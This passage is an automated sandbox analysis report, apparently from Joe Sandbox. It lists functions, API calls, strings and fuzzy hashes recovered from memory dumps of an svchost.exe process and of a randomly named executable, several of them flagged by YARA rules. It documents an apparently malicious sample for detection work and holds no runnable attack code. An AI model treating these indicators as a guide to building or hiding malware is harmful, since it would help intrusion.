PostThreadMessageW.USER32(0507P35R,00000111,00000000,00000000), ref: 007140BA

Strings

0507P35R, xrefs: 007140AF, 007140B9, 007140CA
0507P35R, xrefs: 007140C1, 007140C4

Memory Dump Source

Source File: 00000001.00000002.2272300484.0000000000700000.00000040.80000000.00040000.00000000.sdmp, Offset: 00700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_700000_svchost.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 0507P35R$0507P35R
API String ID: 1836367815-2323980509
Opcode ID: 4670d1a892aa8844bfaa691874384969e0f728cc3ef27198ceb22841a4821db3
Instruction ID: a349a76c29195ecc5485fb2d3b83ecb36d1aff50c7f5f8f285672c8aaaec482d
Opcode Fuzzy Hash: 4670d1a892aa8844bfaa691874384969e0f728cc3ef27198ceb22841a4821db3
Instruction Fuzzy Hash: BE012BB2D0011CFADB10AAE59C81DEF7B7CDF45394F048065FA1477141D6784E068BE1

Function 00714043 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(0507P35R,00000111,00000000,00000000), ref: 007140BA

Strings

0507P35R, xrefs: 007140AF, 007140B9, 007140CA
0507P35R, xrefs: 007140C1, 007140C4

Memory Dump Source

Source File: 00000001.00000002.2272300484.0000000000700000.00000040.80000000.00040000.00000000.sdmp, Offset: 00700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_700000_svchost.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 0507P35R$0507P35R
API String ID: 1836367815-2323980509
Opcode ID: 739ff656b6e558cb2a1cabc7b0af41949b1e501788bd36265d3f0314ddb8ba93
Instruction ID: 948ca46f3fa4c79b8bd328f4057113e4522146cfbcdc016e7586ece35e9311f8
Opcode Fuzzy Hash: 739ff656b6e558cb2a1cabc7b0af41949b1e501788bd36265d3f0314ddb8ba93
Instruction Fuzzy Hash: 3101D6B2D4021CBADB10AAE59C81DEF7B7CDF45794F0481A5FA1867141D6784E068BF1

Function 007140D4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(0507P35R,00000111,00000000,00000000), ref: 007140BA

Strings

0507P35R, xrefs: 007140AF, 007140B9, 007140CA
0507P35R, xrefs: 007140C1, 007140C4

Memory Dump Source

Source File: 00000001.00000002.2272300484.0000000000700000.00000040.80000000.00040000.00000000.sdmp, Offset: 00700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_700000_svchost.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 0507P35R$0507P35R
API String ID: 1836367815-2323980509
Opcode ID: 1c60e40998427d6828ecf0416698d7125c951d1c5c1cd2b24517119f581bc26e
Instruction ID: d0cd600700bc7a2f04a943776e111d590e463ee9fda836ae9e3766ca9b6e647a
Opcode Fuzzy Hash: 1c60e40998427d6828ecf0416698d7125c951d1c5c1cd2b24517119f581bc26e
Instruction Fuzzy Hash: 9CF0F0B2A00118B5DB115A95AC81CFFA76CDE84394F0481A5FA19A7181EA384E428BE1

Function 0072CB63 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0072CBA2

Strings

weq, xrefs: 0072CB66

Memory Dump Source

Source File: 00000001.00000002.2272300484.0000000000700000.00000040.80000000.00040000.00000000.sdmp, Offset: 00700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_700000_svchost.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: weq
API String ID: 3298025750-2440526223
Opcode ID: 94b40011a0e07b04a460fb85af21bc0ba6a9328e507c21814fea76e6886eea4a
Instruction ID: 0428dca4ea7cb8a88097b2496e9c148a45d25bce1f04c96448ac2e5d5e1d7acd
Opcode Fuzzy Hash: 94b40011a0e07b04a460fb85af21bc0ba6a9328e507c21814fea76e6886eea4a
Instruction Fuzzy Hash: EFE06DB2214208BBCA14EE58EC45F9B33BDEFC9710F404019F908A7241C674BD118BB5

Function 00717816 Relevance: 1.5, APIs: 1, Instructions: 43
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00717895

Memory Dump Source

Source File: 00000001.00000002.2272300484.0000000000700000.00000040.80000000.00040000.00000000.sdmp, Offset: 00700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_700000_svchost.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 3acfdc2849712096af051a8a49181b961f7679f1307d7bba36cc4d008d990878
Instruction ID: c4346d5af7cbecb9e60836a7a0bb020280df29a673bfd6472e8bbf385fa20540
Opcode Fuzzy Hash: 3acfdc2849712096af051a8a49181b961f7679f1307d7bba36cc4d008d990878
Instruction Fuzzy Hash: 1DF03171E4410EABDF14DA94D846BEDB374EB54318F0082A5E91C9B181F671DA49CBC1

Function 0072CB13 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000104,?,00724AFF,?,?,00724AFF,?,00000104,?,0000F71F), ref: 0072CB4F

Memory Dump Source

Source File: 00000001.00000002.2272300484.0000000000700000.00000040.80000000.00040000.00000000.sdmp, Offset: 00700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_700000_svchost.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 1b3bf7aaabc3abd77079e067ca5665540d511f7f4f2f3ad1481f7685c8ca6f67
Instruction ID: 2e62267f9d5e5f2aef17930a75f454122f5e57badd299de0d13100fb69ea3670
Opcode Fuzzy Hash: 1b3bf7aaabc3abd77079e067ca5665540d511f7f4f2f3ad1481f7685c8ca6f67
Instruction Fuzzy Hash: EBE06DB1244204BBC614EE58DC46EDB33ADDFC9710F004418FA08A7241C670BD1187B5

Function 0072CBB3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,00000000,00000000,?,5534F046,?,?,5534F046), ref: 0072CBE7

Memory Dump Source

Source File: 00000001.00000002.2272300484.0000000000700000.00000040.80000000.00040000.00000000.sdmp, Offset: 00700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_700000_svchost.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: fb7734863850dffba76ca770a9d7b0b8d665a1f4501d24ca98d2a74677f871a1
Instruction ID: ec756785dec69a050684e5407697d1aa9fd1d66f425194ce86cdf577ad646324
Opcode Fuzzy Hash: fb7734863850dffba76ca770a9d7b0b8d665a1f4501d24ca98d2a74677f871a1
Instruction Fuzzy Hash: 2EE08C36204214BBD620FA69EC42FDB77ADDFC6710F008415FA08A7281CAB4BE1287F1

Function 03272C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03272C24

Memory Dump Source

Source File: 00000001.00000002.2272638847.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3200000_svchost.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ddf7df053cb033a80d889b007025d13a7489c61b1d11ef926f86cbf702ff4bdb
Instruction ID: 8466f779504b5f1cafda1f469c5c32e8834b0409aa59219549dcaadebe4b4433
Opcode Fuzzy Hash: ddf7df053cb033a80d889b007025d13a7489c61b1d11ef926f86cbf702ff4bdb
Instruction Fuzzy Hash: D7B09B719125D5C5EA11F7604608717790577E0701F5AC465D3030645E4739C1D1E175

Non-executed Functions

Function 0327096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON

Download Yara Rule

APIs

Part of subcall function 03272DF0: LdrInitializeThunk.NTDLL ref: 03272DFA

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03270BA3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03270BB6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03270D60
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03270D74

Memory Dump Source

Source File: 00000001.00000002.2272638847.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3200000_svchost.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
String ID:
API String ID: 1404860816-0
Opcode ID: e73986b18dc171c0cfdad3d73b6c045494a24ba842e73cb35f46c5d728584251
Instruction ID: f9d8f0158add07b13046e7d9dc5ecc8f170b72bf400123070320cf22355f4b7f
Opcode Fuzzy Hash: e73986b18dc171c0cfdad3d73b6c045494a24ba842e73cb35f46c5d728584251
Instruction Fuzzy Hash: 00424C75920715DFDB61CF28C880BAAB7F5FF44314F1485AAE989DB241D770AA84CFA0

Function 03272890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0327293C
___swprintf_l.LIBCMT ref: 0327295E
___swprintf_l.LIBCMT ref: 032729A3
___swprintf_l.LIBCMT ref: 032AA52E

Strings

:%u.%u.%u.%u, xrefs: 032AA5B8
::ffff:0:%u.%u.%u.%u, xrefs: 032AA54E
ffff:, xrefs: 032AA504
::%hs%u.%u.%u.%u, xrefs: 032AA527

Memory Dump Source

Source File: 00000001.00000002.2272638847.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3200000_svchost.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: f0c3976081319ee4e2a26ce1f124ac75d00297a1ee97ac2a95d57698c0fa170b
Instruction ID: a54dc0921717355e43369596efffd9a26ace6ef8b88aa23541d0afa79a63cd6a
Opcode Fuzzy Hash: f0c3976081319ee4e2a26ce1f124ac75d00297a1ee97ac2a95d57698c0fa170b
Instruction Fuzzy Hash: 0D51B8B5A24617FFCB10DB9C889097EF7B8BF082007288569E4A5D7641D274DEC4CBE0

Function 032E2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 032E24A6
___swprintf_l.LIBCMT ref: 032E24E2
___swprintf_l.LIBCMT ref: 032E257D
___swprintf_l.LIBCMT ref: 032E25A3
___swprintf_l.LIBCMT ref: 032E25C8
___swprintf_l.LIBCMT ref: 032E2608

Strings

::%hs%u.%u.%u.%u, xrefs: 032E249E
::ffff:0:%u.%u.%u.%u, xrefs: 032E24DA
:%u.%u.%u.%u, xrefs: 032E25FF
ffff:, xrefs: 032E247D, 032E249D

Memory Dump Source

Source File: 00000001.00000002.2272638847.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3200000_svchost.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: f2e111513c44f1a2f8544bd4da3404cbf9ffc3ca9dc8e8c2cc010a7f8b26eb9a
Instruction ID: 01f8d34d66b1f8fff7f492f34826512f23621204787e03dc1b3ec911c4e9a2c4
Opcode Fuzzy Hash: f2e111513c44f1a2f8544bd4da3404cbf9ffc3ca9dc8e8c2cc010a7f8b26eb9a
Instruction Fuzzy Hash: 77512975A20756EECB24EF5CCD9187FB7FCEB44200B848859E4A7CB641D7B4EA808760

Function 03267630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 032A46FC
Execute=1, xrefs: 032A4713
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 032A4725
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 032A4742
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 032A4655
CLIENT(ntdll): Processing section info %ws..., xrefs: 032A4787
ExecuteOptions, xrefs: 032A46A0

Memory Dump Source

Source File: 00000001.00000002.2272638847.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3200000_svchost.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: ae0ccc136d29bc4c7cbdbfef11c42d1e4d4561490d920328c4016e6480bb60b6
Instruction ID: 7926886763741e7b1a912c78a45c1410ee1a83f6d1cd1e514d03949a42215fa9
Opcode Fuzzy Hash: ae0ccc136d29bc4c7cbdbfef11c42d1e4d4561490d920328c4016e6480bb60b6
Instruction Fuzzy Hash: A6510B35620319BBDF11EA6DED85FAE73BCAF14308F0400E9D605AB191D7B0AAD58F50

Function 03306940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2272638847.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3200000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
Instruction ID: be723cca41009f3c3d40d364d636538b84c4fc5d329332f2bbc1160ea7538bbc
Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
Instruction Fuzzy Hash: AE0223B5508341AFC304DF18C9A1A6BBBE5FFC8700F04892DB9899B2A4DB71E945CB52

Function 0327B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 0327B6BF

Strings

0, xrefs: 0327B695
0, xrefs: 0327B66F
-, xrefs: 0327B650
+, xrefs: 0327B65A

Memory Dump Source

Source File: 00000001.00000002.2272638847.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3200000_svchost.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
Instruction ID: e001e4af4ef18d5b9ee414c5d0a0b86d8fe5d5049356b6a5cabcf73d164bc066
Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
Instruction Fuzzy Hash: AF81D175E2524A9EDF28CE68C8917FEBBB5BF45310F1C425AD861AB390C77498C0CB54

Function 032E20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 032E214F
___swprintf_l.LIBCMT ref: 032E2172

Strings

[, xrefs: 032E212B
%%%u, xrefs: 032E2146
]:%u, xrefs: 032E2169

Memory Dump Source

Source File: 00000001.00000002.2272638847.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3200000_svchost.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: 378035b84d1cdac5bb56355708fb774f17c59a10302212110147fc4e22cbd17e
Instruction ID: 1a6ad7516f36d1b4ae05f592742d9565a72ff6155f90bbe2fb544777c2111ac8
Opcode Fuzzy Hash: 378035b84d1cdac5bb56355708fb774f17c59a10302212110147fc4e22cbd17e
Instruction Fuzzy Hash: BC21957AA20319EBCB10EF79CC41AEEBBFCEF44640F480516E905E7201E770DA418BA1

Function 0325F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 032A031E
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 032A02BD
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 032A02E7

Memory Dump Source

Source File: 00000001.00000002.2272638847.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3200000_svchost.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 0770ced0a8543f188d65096712d2bfc3eda5775874fcc5ab36c9d862c537c220
Instruction ID: be7f0e556b13158cc69630657756a1ccfef2e696e369f2ded72237e1c17dbd98
Opcode Fuzzy Hash: 0770ced0a8543f188d65096712d2bfc3eda5775874fcc5ab36c9d862c537c220
Instruction Fuzzy Hash: 6EE1B230624742EFD725CF28C984B2AB7E4BF84714F184A5DF9A58B2D1D7B4DA84CB42

Function 0326BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Resource at %p, xrefs: 032A7B8E
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 032A7B7F
RTL: Re-Waiting, xrefs: 032A7BAC

Memory Dump Source

Source File: 00000001.00000002.2272638847.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3200000_svchost.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: 93c8382d003a1af5c420777872f38e1e2e95cb7b159291926bb5e2ecbe6792d6
Instruction ID: 3437a982b7288415a937c33a05f122bfdd8225231925c00d989783ed3016b93e
Opcode Fuzzy Hash: 93c8382d003a1af5c420777872f38e1e2e95cb7b159291926bb5e2ecbe6792d6
Instruction Fuzzy Hash: 3841E1353207029FC724DE6ACD40B6AB7E9EF88710F140A2DF95ADB690DB71E4C58B91

Function 0326B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 032A728C

Strings

RTL: Resource at %p, xrefs: 032A72A3
RTL: Re-Waiting, xrefs: 032A72C1
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 032A7294

Memory Dump Source

Source File: 00000001.00000002.2272638847.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3200000_svchost.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: 1b454e623a544f7b30e6fde3a50d3c081a99c8f9073638d8b7a40812b3d1ac0f
Instruction ID: b4ef0d45abcb9dd8cf0750245503b0f4995caaab8f432e0e18494ef398bed3f0
Opcode Fuzzy Hash: 1b454e623a544f7b30e6fde3a50d3c081a99c8f9073638d8b7a40812b3d1ac0f
Instruction Fuzzy Hash: 6E41FF35720B06ABC720DE69CC41B6AB7A5FF84710F140629F995EB280DB71E8D28BD5

Function 032E2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 032E238D
___swprintf_l.LIBCMT ref: 032E23B3

Strings

%%%u, xrefs: 032E2384
]:%u, xrefs: 032E23AA

Memory Dump Source

Source File: 00000001.00000002.2272638847.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3200000_svchost.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: 18836de5fd87b1ec9623136bd4798d2e3744f7d1c428deaa92cd06dc0edef5be
Instruction ID: 34bf7510d0e48d27dd44ab201ab035bfc87b1377ae5cc344b44fc9514cb727d0
Opcode Fuzzy Hash: 18836de5fd87b1ec9623136bd4798d2e3744f7d1c428deaa92cd06dc0edef5be
Instruction Fuzzy Hash: D4316876A10319DFDB20EF29DC41BEEB7BCFB44610F844556E849E7240EB709A848F61

Function 03277D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 03277E8B

Strings

+, xrefs: 03277DE8
-, xrefs: 03277DDD

Memory Dump Source

Source File: 00000001.00000002.2272638847.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3200000_svchost.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
Instruction ID: c87f3187002f12933c02a48904b7cdd74a32ebf3003ddae543596ad2d33be7ff
Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
Instruction Fuzzy Hash: F991C371E202179BDF24DF6DC981ABEB7A5FF45320F18452AE865E72C0D77089C18B51

Function 03239126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

$, xrefs: 03239191
@, xrefs: 03239175

Memory Dump Source

Source File: 00000001.00000002.2272638847.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3200000_svchost.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: 572d6aac54eae635856ab768d2069edf3a0ce3ce03660b4df34713a05be4aa76
Instruction ID: d485000cf386a483e8a260abf34842b9dc4d37675d8b88fa4411bc92416875d2
Opcode Fuzzy Hash: 572d6aac54eae635856ab768d2069edf3a0ce3ce03660b4df34713a05be4aa76
Instruction Fuzzy Hash: 678108B6D10269DBDB25DF54CC44BEEB6B8AF09710F0445EAA919B7280D7709EC4CFA0

Analysis Process: xTzxorEdKnFN.exePID: 5580, Parent PID: 7572COMMON

Executed Functions

Function 034C1B5C Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3629829522.0000000003310000.00000040.00000001.00040000.00000000.sdmp, Offset: 03310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3310000_xTzxorEdKnFN.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be6d9598334a7df1c745908e127b9c291270944250dc94c71df6b06ea4a75f0a
Instruction ID: 2f88288549e0bd620f0f6b0bff4f616cdd7f7207ef000632021ab7b1bf6d7ff9
Opcode Fuzzy Hash: be6d9598334a7df1c745908e127b9c291270944250dc94c71df6b06ea4a75f0a
Instruction Fuzzy Hash: F631A5116587F14ED31E836D08B9675AED18E5720174EC2EEDADA6F3E3C4888408D3A5

Function 034C14B4 Relevance: 40.3, Strings: 32, Instructions: 342COMMON

Download Yara Rule

Strings

wc, xrefs: 034C1568
f, xrefs: 034C1782
F, xrefs: 034C14FB
%, xrefs: 034C1663
hG, xrefs: 034C1557
y, xrefs: 034C14F4
4A, xrefs: 034C16B0
C, xrefs: 034C15E7
v, xrefs: 034C1627
;a, xrefs: 034C168A
M, xrefs: 034C1659
2", xrefs: 034C153C
I, xrefs: 034C1750
6, xrefs: 034C176E
AQ, xrefs: 034C16C5
(9, xrefs: 034C15B8
", xrefs: 034C1778
c., xrefs: 034C16BE
gz, xrefs: 034C15A4
^, xrefs: 034C175A
), xrefs: 034C15F1
A, xrefs: 034C1605
Z, xrefs: 034C163B
El;a, xrefs: 034C1939
Z, xrefs: 034C1510
{, xrefs: 034C1735
nL, xrefs: 034C178C
*o, xrefs: 034C1528
n,, xrefs: 034C1A33
6<, xrefs: 034C14E0
y, xrefs: 034C15FB
~, xrefs: 034C1502

Memory Dump Source

Source File: 00000005.00000002.3629829522.0000000003310000.00000040.00000001.00040000.00000000.sdmp, Offset: 03310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3310000_xTzxorEdKnFN.jbxd

Yara matches

Similarity

API ID:
String ID: "$%$(9$)$*o$2"$4A$6$6<$;a$A$AQ$C$El;a$F$I$M$Z$Z$^$c.$f$gz$hG$n,$nL$wc$y$y${$~$v
API String ID: 0-2685655120
Opcode ID: 61c228f82faf892258a78a85a70ea0cc50f9b8162b82f8ca66a17a2dc5b3ca03
Instruction ID: 2ebbb1d13d49b8ef7724f405b22eb9fa714d93cfa9cb69f7bfb003d81e2dd492
Opcode Fuzzy Hash: 61c228f82faf892258a78a85a70ea0cc50f9b8162b82f8ca66a17a2dc5b3ca03
Instruction Fuzzy Hash: E212B1B4D15268CBEB64CF95C8947DDBBB1BB48308F2081DEC0696B282D7795A89CF44

Function 034CEFE4 Relevance: 6.4, Strings: 5, Instructions: 153COMMON

Download Yara Rule

Strings

s, xrefs: 034CF06B
6, xrefs: 034CF079
S, xrefs: 034CF064
\, xrefs: 034CF080
O, xrefs: 034CF072

Memory Dump Source

Source File: 00000005.00000002.3629829522.0000000003310000.00000040.00000001.00040000.00000000.sdmp, Offset: 03310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3310000_xTzxorEdKnFN.jbxd

Yara matches

Similarity

API ID:
String ID: 6$O$S$\$s
API String ID: 0-3854637164
Opcode ID: 6e0b911d27ccd9f3f2ab599d320ca283fa681b3678fc4bf4ca442d02f81e2086
Instruction ID: 9470688219408d56d5442ede60bacff88637184654d85d3bba51f533c0d2c92a
Opcode Fuzzy Hash: 6e0b911d27ccd9f3f2ab599d320ca283fa681b3678fc4bf4ca442d02f81e2086
Instruction Fuzzy Hash: 9751A1B6D10218AFDB14EF95DC88BFFB378EF44711F04469EE9085E100E7745A488BA5

Function 034DD684 Relevance: 2.6, Strings: 2, Instructions: 63COMMON

Download Yara Rule

Strings

p, xrefs: 034DD6CF
8>, xrefs: 034DD6DD

Memory Dump Source

Source File: 00000005.00000002.3629829522.0000000003310000.00000040.00000001.00040000.00000000.sdmp, Offset: 03310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3310000_xTzxorEdKnFN.jbxd

Yara matches

Similarity

API ID:
String ID: p$8>
API String ID: 0-3157777500
Opcode ID: a1f5330a9d1a5c834150dc7a3d1b974f06b372e6145b6a8c653c752c8448db89
Instruction ID: 96663c0148a533fff6e76378ac1c34db2e9bb176acd4d2338bdbb905e5d2ac0d
Opcode Fuzzy Hash: a1f5330a9d1a5c834150dc7a3d1b974f06b372e6145b6a8c653c752c8448db89
Instruction Fuzzy Hash: 5911E2B6E0121CAFCB40DFE9D8419EEBBF9EF48210F14465EE919E7200E7715A058FA5

Function 034DC344 Relevance: 1.3, Strings: 1, Instructions: 65COMMON

Download Yara Rule

Strings

>j, xrefs: 034DC39C

Memory Dump Source

Source File: 00000005.00000002.3629829522.0000000003310000.00000040.00000001.00040000.00000000.sdmp, Offset: 03310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3310000_xTzxorEdKnFN.jbxd

Yara matches

Similarity

API ID:
String ID: >j
API String ID: 0-2910552516
Opcode ID: 022cf068d2031ccbdcd72207a50f469ee85228bad85aca67b8aed5332e6f7f34
Instruction ID: bbd7f1e6c26d695eb413f4f3d132741387ac3aa5d6c7e2306af6c834796190ca
Opcode Fuzzy Hash: 022cf068d2031ccbdcd72207a50f469ee85228bad85aca67b8aed5332e6f7f34
Instruction Fuzzy Hash: 8711F1B6D0121DAF8B40DFA9D8419EFB7F9EF88210F14425AE915E7200E7705A14CBA1

Function 034BACB4 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3629829522.0000000003310000.00000040.00000001.00040000.00000000.sdmp, Offset: 03310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3310000_xTzxorEdKnFN.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 248c1c988b4bc60454d637e734bbd8b9090022b426ccd27192b63faa7b0d496b
